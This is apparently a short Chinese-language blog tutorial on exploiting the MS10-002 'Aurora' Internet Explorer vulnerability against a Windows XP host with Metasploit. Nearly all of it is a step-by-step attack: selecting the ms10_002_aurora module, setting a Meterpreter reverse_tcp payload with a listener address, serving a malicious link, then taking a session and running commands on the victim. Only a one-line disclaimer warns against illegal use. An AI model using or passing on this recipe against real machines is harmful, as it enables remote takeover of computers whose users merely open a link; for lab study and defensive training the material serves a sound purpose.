我們總以爲,是生活欠我們一個滿意,其實,是我們欠生活一個努力。。。。
---- 網易雲熱評
一、漏洞介紹
ms10_002漏洞,它是IE瀏覽器漏洞,也稱“極光漏洞”,可以通過該漏洞獲取目標主機的控制權,。
二、攻擊過程(目標主機是xp系統)
1、啓動msf,搜索ms10_002
search ms10_002
2、選擇模塊use exploit/windows/browser/ms10_002_aurora
3、設置payload,set payload windows/meterpreter/reverse_tcp
4、查看需要設置的參數
show options
5、設置監聽的ip地址,set LHOST 192.168.1.133
6、攻擊run
7、只要目標主機訪問該連接,我們就可以獲取該主機的控制權限
http://192.168.1.133:8080/cZQri76QWY9OhwC
8、指定要控制的目標主機:sessions -i 1
9、輸入ipconfig,獲取目標主機相關信息
禁止非法,後果自負
歡迎關注公衆號:web安全工具庫
